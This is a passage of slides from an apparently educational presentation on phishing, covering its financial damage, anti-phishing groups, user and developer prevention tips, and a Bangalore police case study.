  • 23. DAMAGE CAUSE BY PHISHING • The Impact of phishing are both domestic and international, that are concern with the commercial and financial sectors. • Direct Financial Loss. Phishing technique is mainly done to make financial loss to a person or an organization. In this and consumers and businesses may lose from a few hundred dollars to millions of dollars. • • Erosion of Public Trust in the Internet. Phishing also decreases the public’s trust in the Internet.
  • 24.
  • 25. • A survey found that 9 out of 10 American adult Internet users have made changes to their Internet habits because of the threat of identity theft. • The 30 percent say that they reduced their overall usage. • The 25 percent say they have stopped shopping online, while 29 percent of those that still shop online say they have decreased the frequency of their purchases.
  • 26. Anti-Phishing  Anti-Phishing Working Group (APWG) The APWG has over 2300+ members from over 1500 companies & agencies worldwide. Member companies include leading security companies such as Symantec, McAfee and VeriSign. Financial Industry members include the ING Group,VISA, Mastercard and the American Bankers Association.
  • 27. Educate application users  Think before you open  Never click on the links in an email , message boards or mailing lists  Never submit credentials on forms embedded in emails  Inspect the address bar and SSL certificate  Never open suspicious emails  Ensure that the web browser has the latest security patch applied  Install latest anti-virus packages  Destroy any hard copy of sensitive information  Verify the accounts and transactions regularly  Report the scam via phone or email.
  • 28.  Formulate and enforce Best practices  Authorization controls and access privileges for systems, databases and applications.  Access to any information should be based on need-to- know principle  Segregation of duties.  Media should be disposed only after erasing sensitive information. Reinforce application development / maintenance processes: 1. Web page personalization  Using two pages to authenticate the users.  Using Client-side persistent cookies. 2. Content Validation  Never inherently trust the submitted data  Never present the submitted data back to an application user without sanitizing the same  Always sanitize data before processing or storing  Check the HTTP referrer header
  • 29. 3. Session Handling  Make session identifiers long, complicated and difficult to guess.  Set expiry time limits for the SessionID’s and should be checked for every client request.  Application should be capable of revoking active SessionID’s and not recycle the same SessionID.  Any attempt the invalid SessionID should be redirected to the login page.  Never accept session information within a URL.  Protect the session via SSL.  Session data should be submitted as a POST.  After authenticating, a new SessionID should be used (HTTP & HTTPS).  Never let the users choose the SessionID. 4. Image Regulation  Image Cycling  Session-bound images
  • 30. 5. URL Qualification  Do not reference redirection URL in the browser’s URL  Always maintain a valid approved list of redirection url’s  Never allow customers to supply their own URL’s  Never allow IP addresses to be user in URL information 6. Authentication Process  Ensure that a 2-phase login process is in place  Personalize the content  Design a strong token-based authentication 7. Transaction non-repudiation  To ensure authenticity and integrity of the transaction
  • 31. PREVENTION TO BE TAKEN TO AVOID PHISHING • 1. Prevention: What to Do • Protect your computer with anti-virus software, spyware filters, e-mail filters, and firewall programs, and make sure that they are regularly updated. • Ensure that your Internet browser is up to date and security patches applied. • Avoid responding to any unknown email or giving your financial information to that mail.
  • 32. • Unless the e-mail is digitally signed, it should also be fake. • Phishers typically ask for information such as usernames, passwords, credit card numbers, social security numbers, etc. • Phisher e-mails are typically not personalized, while valid messages from your bank or e-commerce company are generally personalized. • • Always ensure that you're using a secure website when submitting credit card or other sensitive information via your Web browser.
  • 33. • To make sure you're on a secure Web server, check the beginning of the Web address in your browsers address bar - it should be "https://" rather than just "http://." • Regularly log into your online accounts. Don't leave them for a long period of time. • Regularly check your bank, credit and debit card statements to ensure that all transactions are legitimate. • If anything is suspicious, contact your bank and all card issuers.
  • 34.
  • 35. 2. Prevention: What Not to Do • Don't assume that you can correctly identify a website as legitimate by just looking at it. • Don’t use the links in an e-mail to get to any web page, if you think that the message might not be authentic. log onto the website directly by typing in the Web address in your browser. • Avoid filling out forms in e-mail messages that ask for personal financial information.
  • 36. • You should only communicate information such as credit card numbers or account information via a secure website or the telephone.
  • 37. What does all the above imply? It is better to be safer now than feel sorry later.
  • 38. Case study Case - fraud done by Mumbai mafia in IT city City- Bangalore State- karnatka Background • • The cyber crime police of Bangalore, after a two year investigation have proved that the Mumbai mafia is phishing the it city • In this they have arrested three persons in connection in with 3 different incident. • • A cid official of SP’s rank said that this is a dangerous trend.
  • 39.  The cyber crime police station (CCPS) registered around 100 such phishing cases in 2009,but it’s difficult for them to trace every case as they use benami bank account to do all this.  In this the cyber crime police had arrested 3 person ,all from Mumbai who are connected with this case. • The police said that all the arrested person are graduate and have a good knowledge in computer
  • 40. Investigation • The cyber crime police had arrested one abdul khan from Mumbai. • The arrested person had transferred rs 1 lakh (rs 50000 in twice) from the icici account of one it professional abhishek malvia anative of itarsi , Madhya Pradesh.
  • 41. Conclusion • Phishing is a form of criminal conduct that poses increasing threats to consumers, financial institutions, and commercial enterprises in Canada, the United States, and other countries. Because phishing shows no sign of abating, and indeed is likely to continue in newer and more sophisticated forms, law enforcement, other government agencies, and the private sector in both countries will need to cooperate more closely than ever in their efforts to combat phishing, through improved public education, prevention, authentication, and binational and national enforcement efforts.